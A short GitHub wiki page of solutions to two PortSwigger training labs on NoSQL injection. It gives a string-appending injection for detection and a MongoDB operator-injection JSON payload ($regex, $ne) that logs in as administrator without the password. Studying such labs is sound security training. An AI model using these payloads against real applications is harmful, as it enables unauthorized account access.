NoSQL injection - gachikuku/portswigger GitHub Wiki Apprentice lab:Detecting NoSQL injection Solution Select a category. Append '||'1'=='1. Apprentice lab:Exploiting NoSQL operator injection to bypass authentication Solution Log in as wiener:peter. Observe the JSON POST request. Tamper with it, to login as administrator. Get familiar with MongoDB. { "username": { "$regex":"admin.*" }, "password": { "$ne": "" } } ⚠️ **GitHub.com Fallback** ⚠️